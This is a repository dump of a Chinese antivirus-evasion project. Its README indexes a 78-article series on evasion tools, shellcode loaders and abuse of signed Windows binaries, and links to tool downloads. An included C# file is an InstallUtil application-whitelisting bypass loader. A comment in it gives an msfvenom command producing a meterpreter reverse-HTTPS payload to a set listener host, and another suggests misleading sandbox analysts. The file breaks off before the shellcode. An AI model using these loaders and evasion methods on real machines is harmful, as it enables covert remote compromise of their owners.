--------------------------------------------------------------------------------
/70.远控免杀专题(70)-终结篇.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/70.远控免杀专题(70)-终结篇.pdf
--------------------------------------------------------------------------------
/71.远控免杀专题(71)-Donut免杀任意可执行文件(VT免杀率30-67).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/71.远控免杀专题(71)-Donut免杀任意可执行文件(VT免杀率30-67).pdf
--------------------------------------------------------------------------------
/72.远控免杀专题(72)-sRDI反射型DLL注入免杀(VT查杀率16-61).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/72.远控免杀专题(72)-sRDI反射型DLL注入免杀(VT查杀率16-61).pdf
--------------------------------------------------------------------------------
/73.远控免杀专题(73)-使用stager.dll的多种免杀方式(VT查杀率7-72).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/73.远控免杀专题(73)-使用stager.dll的多种免杀方式(VT查杀率7-72).pdf
--------------------------------------------------------------------------------
/74.远控免杀专题(74)-基于Go的条件触发式免杀(VT查杀率7-70).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/74.远控免杀专题(74)-基于Go的条件触发式免杀(VT查杀率7-70).pdf
--------------------------------------------------------------------------------
/75.远控免杀专题(75)-基于Go的沙箱检测(VT查杀率8-70).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/75.远控免杀专题(75)-基于Go的沙箱检测(VT查杀率8-70).pdf
--------------------------------------------------------------------------------
/76.远控免杀专题(76)-基于Go的各种API免杀测试.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/76.远控免杀专题(76)-基于Go的各种API免杀测试.pdf
--------------------------------------------------------------------------------
/77.远控免杀专题(77)-基于Go的免杀小结.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/77.远控免杀专题(77)-基于Go的免杀小结.pdf
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # BypassAntiVirus
2 |
3 | **本文为Tide安全团队成员`重剑无锋`原创文章,转载请声明出处!**
4 |
5 | **郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!**
6 |
7 | **本专题文章在线文库:[http://wiki.tidesec.com/docs/bypassav](http://wiki.tidesec.com/docs/bypassav)**
8 |
9 | **潮影在线免杀平台:[http://bypass.tidesec.com/](http://bypass.tidesec.com/)**
10 |
11 | ---
12 |
13 | 一直从事web安全多一些,对waf绕过还稍微有些研究,但是对远控免杀的认知还大约停留在ASPack、UPX加壳、特征码定位及修改免杀的年代。近两年随着hw和红蓝对抗的增多,接触到的提权、内网渗透、域渗透也越来越多。攻击能力有没有提升不知道,但防护水平明显感觉提升了一大截,先不说防护人员的技术水平如果,最起码各种云WAF、防火墙、隔离设备部署的多了,服务器上也经常能见到安装了杀软、软waf、agent等等,特别是某数字杀软在国内服务器上尤为普及。这个时候,不会点免杀技术就非常吃亏了。
14 |
15 | 但web狗一般对逆向和二进制都不大熟,编译运行别人的代码都比较费劲,这时候就只能靠现成的工具来曲线救国了。为此,我从互联网上搜集了大约20款知名度比较高的免杀工具研究免杀原理及免杀效果测试,后面还学习了一下各种语言编译加载shellcode的各种姿势,又补充了一些白名单加载payload的常见利用,于是就有了这一个远控免杀的系列文章。
16 |
17 | - **工具篇内容**:msf自免杀、Veil、Venom、Shellter、BackDoor-Factory、Avet、TheFatRat、Avoidz、Green-Hat-Suite、zirikatu、AVIator、DKMC、Unicorn、Python-Rootkit、ASWCrypter、nps_payload、GreatSCT、HERCULES、SpookFlare、SharpShooter、CACTUSTORCH、Winpayload等。
18 |
19 | - **代码篇内容**:C/C++、C#、python、powershell、ruby、go等。
20 |
21 | - **白名单内容**:总计涉及113个白名单程序,包括Rundll32.exe、Msiexec.exe、MSBuild.exe、InstallUtil.exe、Mshta.exe、Regsvr32.exe、Cmstp.exe、CScript.exe、WScript.exe、Forfiles.exe、te.exe、Odbcconf.exe、InfDefaultInstall.exe、Diskshadow.exe、PsExec.exe、Msdeploy.exe、Winword.exe、Regasm.exe、Regsvcs.exe、Ftp.exe、pubprn.vbs、winrm.vbs、slmgr.vbs、Xwizard.exe、Compiler.exe、IEExec.exe、MavInject32、Presentationhost.exe、Wmic.exe、Pcalua.exe、Url.dll、zipfldr.dll、Syncappvpublishingserver.vbs等。
22 |
23 | - **其他内容**:在整个免杀系列文章编写过程中,还穿插写了几篇免杀实践的文章,比如shellcode免杀实践、cs免杀实践、mimikatz免杀实践等几篇文章,水平比较一般,各位小伙伴凑合着看吧。
24 |
25 | **已完成的免杀文章及相关软件下载:[`https://github.com/TideSec/BypassAntiVirus`](https://github.com/TideSec/BypassAntiVirus)**
26 |
27 | **远控免杀系列文章打包及配套工具百度网盘下载**:
28 | 链接: [https://pan.baidu.com/s/1YKbNHzWudMwjGx-3_7KZxw](https://pan.baidu.com/s/1YKbNHzWudMwjGx-3_7KZxw) 提取码: 5q5q
29 | 解压密码为www.tidesec.com
30 |
31 | # 免杀能力一览表
32 |
33 |
34 | **1、表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。**
35 |
36 | **2、为了更好的对比效果,大部分测试payload均使用msf的`windows/meterperter/reverse_tcp`模块生成。**
37 |
38 | **3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本`5.0.0.8160`(2020.01.01),火绒版本`5.0.34.16`(2020.01.01),360安全卫士`12.0.0.2002`(2020.01.01)。**
39 |
40 | **4、其他杀软的检测指标是在`virustotal.com`(简称VT)上在线查杀,所以可能只是代表了静态查杀能力,数据仅供参考,不足以作为杀软查杀能力或免杀能力的判断指标。**
41 |
42 | **5、完全不必要苛求一种免杀技术能bypass所有杀软,这样的技术肯定是有的,只是没被公开,一旦公开第二天就能被杀了,其实我们只要能bypass目标主机上的杀软就足够了。**
43 |
44 | **6、由于白名单程序加载payload的免杀测试需要杀软的行为检测才合理,静态查杀payload或者查杀白名单程序都没有任何意义,所以这里对白名单程序的免杀效果不做评判。**
45 |
46 | 
47 | 
48 |
49 | # 文章导航
50 |
51 | 1.远控免杀专题(1)-基础篇:[https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg](https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg)
52 |
53 | 2.远控免杀专题(2)-msfvenom隐藏的参数:[https://mp.weixin.qq.com/s/1r0iakLpnLrjCrOp2gT10w](https://mp.weixin.qq.com/s/1r0iakLpnLrjCrOp2gT10w)
54 |
55 | 3.远控免杀专题(3)-msf自带免杀(VT免杀率35/69):[https://mp.weixin.qq.com/s/A0CZslLhCLOK_HgkHGcpEA](https://mp.weixin.qq.com/s/A0CZslLhCLOK_HgkHGcpEA)
56 |
57 | 4.远控免杀专题(4)-Evasion模块(VT免杀率12/71):[https://mp.weixin.qq.com/s/YnnCM7W20xScv52k_ubxYQ](https://mp.weixin.qq.com/s/YnnCM7W20xScv52k_ubxYQ)
58 |
59 | 5.远控免杀专题(5)-Veil免杀(VT免杀率23/71):[https://mp.weixin.qq.com/s/-PHVIAQVyU8QIpHwcpN4yw](https://mp.weixin.qq.com/s/-PHVIAQVyU8QIpHwcpN4yw)
60 |
61 | 6.远控免杀专题(6)-Venom免杀(VT免杀率11/71):[https://mp.weixin.qq.com/s/CbfxupSWEPB86tBZsmxNCQ](https://mp.weixin.qq.com/s/CbfxupSWEPB86tBZsmxNCQ)
62 |
63 | 7.远控免杀专题(7)-Shellter免杀(VT免杀率7/69):[https://mp.weixin.qq.com/s/ASnldn6nk68D4bwkfYm3Gg](https://mp.weixin.qq.com/s/ASnldn6nk68D4bwkfYm3Gg)
64 |
65 | 8.远控免杀专题(8)-BackDoor-Factory免杀(VT免杀率13/71):[https://mp.weixin.qq.com/s/A30JHhXhwe45xV7hv8jvVQ](https://mp.weixin.qq.com/s/A30JHhXhwe45xV7hv8jvVQ)
66 |
67 | 9.远控免杀专题(9)-Avet免杀(VT免杀率14/71):[https://mp.weixin.qq.com/s/EIfqAbMC8HoC6xcZP9SXpA](https://mp.weixin.qq.com/s/EIfqAbMC8HoC6xcZP9SXpA)
68 |
69 | 10.远控免杀专题(10)-TheFatRat免杀(VT免杀率22/70):[https://mp.weixin.qq.com/s/zOvwfmEtbkpGWWBn642ICA](https://mp.weixin.qq.com/s/zOvwfmEtbkpGWWBn642ICA)
70 |
71 | 11.远控免杀专题(11)-Avoidz免杀(VT免杀率23/71):[https://mp.weixin.qq.com/s/TnfTXihlyv696uCiv3aWfg](https://mp.weixin.qq.com/s/TnfTXihlyv696uCiv3aWfg)
72 |
73 | 12.远控免杀专题(12)-Green-Hat-Suite免杀(VT免杀率23/70):[https://mp.weixin.qq.com/s/MVJTXOIqjgL7iEHrnq6OJg](https://mp.weixin.qq.com/s/MVJTXOIqjgL7iEHrnq6OJg)
74 |
75 | 13.远控免杀专题(13)-zirikatu免杀(VT免杀率39/71):[https://mp.weixin.qq.com/s/5xLuu5UfF4cQbCq_6JeqyA](https://mp.weixin.qq.com/s/5xLuu5UfF4cQbCq_6JeqyA)
76 |
77 | 14.远控免杀专题(14)-AVIator免杀(VT免杀率25/69):[https://mp.weixin.qq.com/s/JYMq_qHvnslVlqijHNny8Q](https://mp.weixin.qq.com/s/JYMq_qHvnslVlqijHNny8Q)
78 |
79 | 15.远控免杀专题(15)-DKMC免杀(VT免杀率8/55):[https://mp.weixin.qq.com/s/UZqOBQKEMcXtF5ZU7E55Fg](https://mp.weixin.qq.com/s/UZqOBQKEMcXtF5ZU7E55Fg)
80 |
81 | 16.远控免杀专题(16)-Unicorn免杀(VT免杀率29/56):[https://mp.weixin.qq.com/s/y7P6bvHRFes854EAHAPOzw](https://mp.weixin.qq.com/s/y7P6bvHRFes854EAHAPOzw)
82 |
83 | 17.远控免杀专题(17)-Python-Rootkit免杀(VT免杀率7/69):[https://mp.weixin.qq.com/s/OzO8hv0pTX54ex98k96tjQ](https://mp.weixin.qq.com/s/OzO8hv0pTX54ex98k96tjQ)
84 |
85 | 18.远控免杀专题(18)-ASWCrypter免杀(VT免杀率19/57):[https://mp.weixin.qq.com/s/tT1i55swRWIYiEdxEWElSQ](https://mp.weixin.qq.com/s/tT1i55swRWIYiEdxEWElSQ)
86 |
87 | 19.远控免杀专题(19)-nps_payload免杀(VT免杀率3/57):[https://mp.weixin.qq.com/s/XmSRgRUftMV3nmD1Gk0mvA](https://mp.weixin.qq.com/s/XmSRgRUftMV3nmD1Gk0mvA)
88 |
89 | 20.远控免杀专题(20)-GreatSCT免杀(VT免杀率14/56):[https://mp.weixin.qq.com/s/s9DFRIgpvpE-_MneO0B_FQ](https://mp.weixin.qq.com/s/s9DFRIgpvpE-_MneO0B_FQ)
90 |
91 | 21.远控免杀专题(21)-HERCULES免杀(VT免杀率29/70):[https://mp.weixin.qq.com/s/Rkr9lixzL4tiL89r10ndig](https://mp.weixin.qq.com/s/Rkr9lixzL4tiL89r10ndig)
92 |
93 | 22.远控免杀专题(22)-SpookFlare免杀(VT免杀率16/67):[https://mp.weixin.qq.com/s/LfuQ2XuD7YHUWJqMRUmNVA](https://mp.weixin.qq.com/s/LfuQ2XuD7YHUWJqMRUmNVA)
94 |
95 | 23.远控免杀专题(23)-SharpShooter免杀(VT免杀率22/57):[https://mp.weixin.qq.com/s/EyvGfWXLbxkHe7liaNFhGg](https://mp.weixin.qq.com/s/EyvGfWXLbxkHe7liaNFhGg)
96 |
97 | 24.远控免杀专题(24)-CACTUSTORCH免杀(VT免杀率23/57):[https://mp.weixin.qq.com/s/g0CYvFMsrV7bHIfTnSUJBw](https://mp.weixin.qq.com/s/g0CYvFMsrV7bHIfTnSUJBw)
98 |
99 | 25.远控免杀专题(25)-Winpayloads免杀(VT免杀率18/70):[https://mp.weixin.qq.com/s/YTXT31mCOWhMZEbCg4Jt0w](https://mp.weixin.qq.com/s/YTXT31mCOWhMZEbCg4Jt0w)
100 |
101 |
102 | 26.远控免杀专题(26)-C、C++加载免杀(上)(VT免杀率9-70):[https://mp.weixin.qq.com/s/LftwV4bpuikDklIjuRw2LQ](https://mp.weixin.qq.com/s/LftwV4bpuikDklIjuRw2LQ)
103 |
104 | 27.远控免杀专题(27)-C、C++加载免杀(中)(VT免杀率8-70):[https://mp.weixin.qq.com/s/McVWP386q5in6cQ8hRxwdA](https://mp.weixin.qq.com/s/McVWP386q5in6cQ8hRxwdA)
105 |
106 | 28.远控免杀专题(28)-C、C++加载免杀(下)(VT免杀率3-71):[https://mp.weixin.qq.com/s/Kw3-fdyHyiettYn44WNZQw](https://mp.weixin.qq.com/s/Kw3-fdyHyiettYn44WNZQw)
107 |
108 | 29.远控免杀专题(29)-C#加载免杀-5种方式(VT免杀率8-70):[https://mp.weixin.qq.com/s/Kvhfb13d2_D6m-Bu9Darog](https://mp.weixin.qq.com/s/Kvhfb13d2_D6m-Bu9Darog)
109 |
110 | 30.远控免杀专题(30)-Python加载免杀-8种方式(VT免杀率10-69):[https://mp.weixin.qq.com/s/HyBSqrF_kl2ARaCYAMefgA](https://mp.weixin.qq.com/s/HyBSqrF_kl2ARaCYAMefgA)
111 |
112 | 31.远控免杀专题(31)-powershell加载-4种方式(VT免杀率5-58):[https://mp.weixin.qq.com/s/Tw-FAduHMVzek_YxIErQDQ](https://mp.weixin.qq.com/s/Tw-FAduHMVzek_YxIErQDQ)
113 |
114 | 32.远控免杀专题(32)-Go加载免杀-3种方式(VT免杀率7-70):[https://mp.weixin.qq.com/s/TmfDQgRfEp2qg9SKbD0Quw](https://mp.weixin.qq.com/s/TmfDQgRfEp2qg9SKbD0Quw)
115 |
116 | 33.远控免杀专题(33)-Ruby加载免杀(VT免杀率0-58):[https://mp.weixin.qq.com/s/2eF6LklvdGetgbhYWdaFIg](https://mp.weixin.qq.com/s/2eF6LklvdGetgbhYWdaFIg)
117 |
118 | 34.远控免杀专题(34)-白名单MSBuild.exe(VT免杀率4-57):[https://mp.weixin.qq.com/s/1WEglPXm1Q5n6T-c4OhhXA](https://mp.weixin.qq.com/s/1WEglPXm1Q5n6T-c4OhhXA)
119 |
120 | 35.远控免杀专题(35)-白名单Msiexec.exe(VT免杀率27-60):[https://mp.weixin.qq.com/s/XPrBK1Yh5ggO-PeK85mqcg](https://mp.weixin.qq.com/s/XPrBK1Yh5ggO-PeK85mqcg)
121 |
122 | 36.远控免杀专题(36)-白名单InstallUtil.exe(VT免杀率3-68):[https://mp.weixin.qq.com/s/gN2p3ZHODZFia2761BVSzg](https://mp.weixin.qq.com/s/gN2p3ZHODZFia2761BVSzg)
123 |
124 | 37.远控免杀专题(37)-白名单Mshta.exe(VT免杀率26-58):[https://mp.weixin.qq.com/s/oBr-syv2ef5IjeGFrs7sHg](https://mp.weixin.qq.com/s/oBr-syv2ef5IjeGFrs7sHg)
125 |
126 | 38.远控免杀专题(38)-白名单Rundll32.exe(VT免杀率22-58):[https://mp.weixin.qq.com/s/rmC4AWC6HmcphozfEZhRGA](https://mp.weixin.qq.com/s/rmC4AWC6HmcphozfEZhRGA)
127 |
128 | 39.远控免杀专题(39)-白名单Regsvr32.exe(VT免杀率18-58):[https://mp.weixin.qq.com/s/6v8w2YZLxHJFnXb-IbnYAA](https://mp.weixin.qq.com/s/6v8w2YZLxHJFnXb-IbnYAA)
129 |
130 | 40.远控免杀专题(40)-白名单Cmstp.exe(VT查杀率为21-57):[https://mp.weixin.qq.com/s/tgtvOMDGlKFwdRQEnKJf5Q](https://mp.weixin.qq.com/s/tgtvOMDGlKFwdRQEnKJf5Q)
131 |
132 | 41.远控免杀专题(41)-白名单Ftp.exe:[https://mp.weixin.qq.com/s/rnmCIx5oxA9z-0OfjoUAVw](https://mp.weixin.qq.com/s/rnmCIx5oxA9z-0OfjoUAVw)
133 |
134 | 42.远控免杀专题(42)-白名单Regasm/Regsvcs.exe:[https://mp.weixin.qq.com/s/MCMjxPdUNdwV8is04AklLA](https://mp.weixin.qq.com/s/MCMjxPdUNdwV8is04AklLA)
135 |
136 | 43.远控免杀专题(43)-白名单Compiler.exe:[https://mp.weixin.qq.com/s/Sm_3cJlSk6Pud1CLp-eAEQ](https://mp.weixin.qq.com/s/Sm_3cJlSk6Pud1CLp-eAEQ)
137 |
138 | 44.远控免杀专题(44)-白名单MavInject.exe:[https://mp.weixin.qq.com/s/dPOGj1VLhqwxJ0e-gOs8vA](https://mp.weixin.qq.com/s/dPOGj1VLhqwxJ0e-gOs8vA)
139 |
140 | 45.远控免杀专题(45)-白名单presentationhost.exe:[https://mp.weixin.qq.com/s/r9l5Lh6MHv-Ece2DFr3EsA](https://mp.weixin.qq.com/s/r9l5Lh6MHv-Ece2DFr3EsA)
141 |
142 | 46.远控免杀专题(46)-白名单IEexec.exe:[https://mp.weixin.qq.com/s/wVbFrU9cE3hCYAENjmnSUQ](https://mp.weixin.qq.com/s/wVbFrU9cE3hCYAENjmnSUQ)
143 |
144 | 47.远控免杀专题(47)-白名单winrm.vbs、slmgr.vbs:[https://mp.weixin.qq.com/s/B3oiMrEB98jtm4DvD2t2tQ](https://mp.weixin.qq.com/s/B3oiMrEB98jtm4DvD2t2tQ)
145 |
146 | 48.远控免杀专题(48)-白名单pubprn.vbs:[https://mp.weixin.qq.com/s/btiaVMBPxfxG4oXPa7__kw](https://mp.weixin.qq.com/s/btiaVMBPxfxG4oXPa7__kw)
147 |
148 | 49.远控免杀专题(49)-白名单Xwizard.exe:[https://mp.weixin.qq.com/s/8gaweOqkOrT77riaevvFUg](https://mp.weixin.qq.com/s/8gaweOqkOrT77riaevvFUg)
149 |
150 | 50.远控免杀专题(50)-白名单winword.exe:[https://mp.weixin.qq.com/s/qXWK5i2cDaletSzkAEzL3w](https://mp.weixin.qq.com/s/qXWK5i2cDaletSzkAEzL3w)
151 |
152 | 51.远控免杀专题(51)-白名单msdeloy.exe:[https://mp.weixin.qq.com/s/1oEzadXZxd3JukrBhNxxyw](https://mp.weixin.qq.com/s/1oEzadXZxd3JukrBhNxxyw)
153 |
154 | 52.远控免杀专题(52)-白名单psexec.exe:[https://mp.weixin.qq.com/s/JdOmlqif67GcSqZuuGPz0Q](https://mp.weixin.qq.com/s/JdOmlqif67GcSqZuuGPz0Q)
155 |
156 | 53.远控免杀专题(53)-白名单WMIC.exe:[https://mp.weixin.qq.com/s/QNqM8Vdlu-SOP7ZqnRWY3w](https://mp.weixin.qq.com/s/QNqM8Vdlu-SOP7ZqnRWY3w)
157 |
158 | 54.远控免杀专题(54)-白名单SyncAppvPublishingServer.vbs:[https://mp.weixin.qq.com/s/Ud7TbeMJb8fsRlaGHWhBww](https://mp.weixin.qq.com/s/Ud7TbeMJb8fsRlaGHWhBww)
159 |
160 | 55.远控免杀专题(55)-白名单Pcalua.exe:[https://mp.weixin.qq.com/s/Aj9A5_LRS_uX8XN1rdUobQ](https://mp.weixin.qq.com/s/Aj9A5_LRS_uX8XN1rdUobQ)
161 |
162 | 56.远控免杀专题(56)-白名单zipfldr.dll:[https://mp.weixin.qq.com/s/-qPVenI_lk-ZnMA4j9XNRQ](https://mp.weixin.qq.com/s/-qPVenI_lk-ZnMA4j9XNRQ)
163 |
164 | 57.远控免杀专题(57)-白名单Url.dll:[https://mp.weixin.qq.com/s/GzoYvfj7NkXe_nc8eOVEBQ](https://mp.weixin.qq.com/s/GzoYvfj7NkXe_nc8eOVEBQ)
165 |
166 | 58.远控免杀专题(58)-白名单DiskShadow.exe:[https://mp.weixin.qq.com/s/pr0KYjk80YIk4qJO5h3Yaw](https://mp.weixin.qq.com/s/pr0KYjk80YIk4qJO5h3Yaw)
167 |
168 | 59.远控免杀专题(59)-白名单Odbcconf.exe:[https://mp.weixin.qq.com/s/uOwqbW0nkG776zZz6O_WFA](https://mp.weixin.qq.com/s/uOwqbW0nkG776zZz6O_WFA)
169 |
170 | 60.远控免杀专题(60)-白名单Forfiles.exe:[https://mp.weixin.qq.com/s/1-HyeNrd4IXQYsyG6dHQkw](https://mp.weixin.qq.com/s/1-HyeNrd4IXQYsyG6dHQkw)
171 |
172 | 61.远控免杀专题(61)-白名单Te.exe:[https://mp.weixin.qq.com/s/m37wm620qQ1xw4BN2hGOpg](https://mp.weixin.qq.com/s/m37wm620qQ1xw4BN2hGOpg)
173 |
174 | 62.远控免杀专题(62)-白名单CScript.exe-WScript.exe:[https://mp.weixin.qq.com/s/jzWHq7Yc1UjOwnXulIAPKQ](https://mp.weixin.qq.com/s/jzWHq7Yc1UjOwnXulIAPKQ)
175 |
176 | 63.远控免杀专题(63)-白名单InfDefaultInstall.exe:[https://mp.weixin.qq.com/s/mrtX4ayCXJJ1LPfBlSuvHw](https://mp.weixin.qq.com/s/mrtX4ayCXJJ1LPfBlSuvHw)
177 |
178 | 64.远控免杀专题(64)-Msf自编译免杀补充:[https://mp.weixin.qq.com/s/HsIqUKl7j1WJ4yyYzXdPZg](https://mp.weixin.qq.com/s/HsIqUKl7j1WJ4yyYzXdPZg)
179 |
180 | 65.远控免杀专题(65)-shellcode免杀实践补充:[https://mp.weixin.qq.com/s/J78CPtHJX5ouN6fxVxMFgg](https://mp.weixin.qq.com/s/J78CPtHJX5ouN6fxVxMFgg)
181 |
182 | 66.远控免杀专题(66)-工具篇总结:[https://mp.weixin.qq.com/s/WdErH1AOaI3B5Kptu7DK5Q](https://mp.weixin.qq.com/s/WdErH1AOaI3B5Kptu7DK5Q)
183 |
184 | 67.远控免杀专题(67)-白名单篇总结:[https://mp.weixin.qq.com/s/2bC5otYgIgGnod-cXwkfqw](https://mp.weixin.qq.com/s/2bC5otYgIgGnod-cXwkfqw)
185 |
186 | 68.远控免杀专题(68)-Mimikatz免杀实践(上):[https://mp.weixin.qq.com/s/CiOaMnJBcEQfZXV_hopzLw](https://mp.weixin.qq.com/s/CiOaMnJBcEQfZXV_hopzLw)
187 |
188 | 69.远控免杀专题(69)-Mimikatz免杀实践(下):[https://mp.weixin.qq.com/s/0p88rj-tWClLa_geKMkPgw](https://mp.weixin.qq.com/s/0p88rj-tWClLa_geKMkPgw)
189 |
190 | 70.远控免杀专题(70)-终结篇:[https://mp.weixin.qq.com/s/4shT8tP-Gu3XX7fnWKQHAA](https://mp.weixin.qq.com/s/4shT8tP-Gu3XX7fnWKQHAA)
191 |
192 | 71.远控免杀专题(71)-Donut免杀任意可执行文件: [https://mp.weixin.qq.com/s/DoWRTIIBwuvzRd59wIWpXw](https://mp.weixin.qq.com/s/DoWRTIIBwuvzRd59wIWpXw)
193 |
194 | 72.远控免杀专题(72)-sRDI反射型DLL注入免杀: [https://mp.weixin.qq.com/s/GeR1Uc2zmdoHUD1m4PUPkA](https://mp.weixin.qq.com/s/GeR1Uc2zmdoHUD1m4PUPkA)
195 |
196 | 73.远控免杀专题(73)-使用stager.dll的多种免杀方式: [https://mp.weixin.qq.com/s/23fZTmpT7YVkguvHfXC57Q](https://mp.weixin.qq.com/s/23fZTmpT7YVkguvHfXC57Q)
197 |
198 | 74.远控免杀专题(74)-基于Go的条件触发式免杀: [https://mp.weixin.qq.com/s/td9_TFaM8svEmq4uBWxBXg](https://mp.weixin.qq.com/s/td9_TFaM8svEmq4uBWxBXg)
199 |
200 | 75.远控免杀专题(75)-基于Go的沙箱检测: [https://mp.weixin.qq.com/s/I04c944ED0UBWY8_Hq0t0g](https://mp.weixin.qq.com/s/I04c944ED0UBWY8_Hq0t0g)
201 |
202 | 76.远控免杀专题(76)-基于Go的各种API免杀测试: [https://mp.weixin.qq.com/s/c4LkV7PdzaXYH7H1Ix6mcA](https://mp.weixin.qq.com/s/c4LkV7PdzaXYH7H1Ix6mcA)
203 |
204 | 77.远控免杀专题(77)-基于Go的免杀总结: [https://mp.weixin.qq.com/s/yxDYccGRgUayd4XeHkrNQg](https://mp.weixin.qq.com/s/yxDYccGRgUayd4XeHkrNQg)
205 |
206 | 78.潮影在线免杀平台上线: [https://mp.weixin.qq.com/s/nuUg8lOdghdcI5egMqzD0A](https://mp.weixin.qq.com/s/nuUg8lOdghdcI5egMqzD0A)
207 |
208 | **完结!撒花~**
209 |
210 | # 关于Tide安全团队
211 |
212 | Tide安全团队致力于分享高质量原创文章,研究方向覆盖网络攻防、Web安全、移动终端、安全开发、IoT/物联网/工控安全等多个领域,对安全感兴趣的小伙伴可以关注或加入我们。
213 |
214 | Tide安全团队自研开源多套安全平台,如Tide(潮汐)网络空间搜索平台、潮启移动端安全管控平台、分布式web扫描平台WDScanner、Mars网络威胁监测平台、潮汐指纹识别系统、潮巡自动化漏洞挖掘平台、工业互联网安全监测平台、漏洞知识库、代理资源池、字典权重库、内部培训系统等等。
215 |
216 | Tide安全团队自建立之初持续向CNCERT、CNVD、漏洞盒子、补天、各大SRC等漏洞提交平台提交漏洞,在漏洞盒子先后组建的两支漏洞挖掘团队在全国300多个安全团队中均拥有排名前十的成绩。团队成员在FreeBuf、安全客、安全脉搏、t00ls、简书、CSDN、51CTO、CnBlogs等网站开设专栏或博客,研究安全技术、分享经验技能。
217 |
218 | 对安全感兴趣的小伙伴可以关注Tide安全团队Wiki:[http://paper.TideSec.com](http://paper.TideSec.com) 或团队公众号。
219 |
220 | <div align=center><img src=images/ewm.png width=30% ></div>
221 |
222 |
--------------------------------------------------------------------------------
/images/0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/images/0.png
--------------------------------------------------------------------------------
/images/ewm.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/images/ewm.png
--------------------------------------------------------------------------------
/images/msnl01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/images/msnl01.png
--------------------------------------------------------------------------------
/images/msnl02.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/images/msnl02.png
--------------------------------------------------------------------------------
/images/tide.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/images/tide.png
--------------------------------------------------------------------------------
/images/tide2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/images/tide2.png
--------------------------------------------------------------------------------
/tools/AVIator.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/AVIator.zip
--------------------------------------------------------------------------------
/tools/DotNetToJScript.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/DotNetToJScript.zip
--------------------------------------------------------------------------------
/tools/InstallUtil-Shellcode.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Net;
3 | using System.Diagnostics;
4 | using System.Reflection;
5 | using System.Configuration.Install;
6 | using System.Runtime.InteropServices;
7 |
8 | /*
9 | Author: Casey Smith, Twitter: @subTee
10 | License: BSD 3-Clause
11 | Step One:
12 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:exeshell.exe Shellcode.cs
13 | Step Two:
14 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
15 | (Or)
16 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
17 | The gist of this one is we can exhibit one behaviour if the application is launched via normal method, Main().
18 | Yet, when the Assembly is launched via InstallUtil.exe, it is loaded via Reflection and circumvents many whitelist controls.
19 | We believe the root issue here is:
20 |
21 | The root issue here with Assembly.Load() is that at the point at which execute operations are detected
22 | (CreateFileMapping->NtCreateSection), only read-only access to the section is requested, so it is not processed as an execute operation.
23 | Later, execute access is requested in the file mapping (MapViewOfFile->NtMapViewOfSection),
24 | which results in the image being mapped as EXECUTE_WRITECOPY and subsequently allows unchecked execute access.
25 |
26 | The concern is this technique can circumvent many security products, so I wanted to make you aware and get any feedback.
27 | Its not really an exploit, but just a creative way to launch an exe/assembly.
28 | */
29 |
30 | //root@infosec:~# msfvenom --payload windows/meterpreter/reverse_https LHOST=10.0.0.1 LPORT=443 -f csharp > pentestShellCode.txt
31 |
32 | public class Program
33 | {
34 | public static void Main()
35 | {
36 | Console.WriteLine("Hello From Main...I Don't Do Anything");
37 | //Add any behaviour here to throw off sandbox execution/analysts :)
38 |
39 | }
40 |
41 | }
42 |
43 | [System.ComponentModel.RunInstaller(true)]
44 | public class Sample : System.Configuration.Install.Installer
45 | {
46 | //The Methods can be Uninstall/Install. Install is transactional, and really unnecessary.
47 | public override void Uninstall(System.Collections.IDictionary savedState)
48 | {
49 |
50 | Shellcode.Exec();
51 |
52 | }
53 |
54 | }
55 |
56 | public class Shellcode
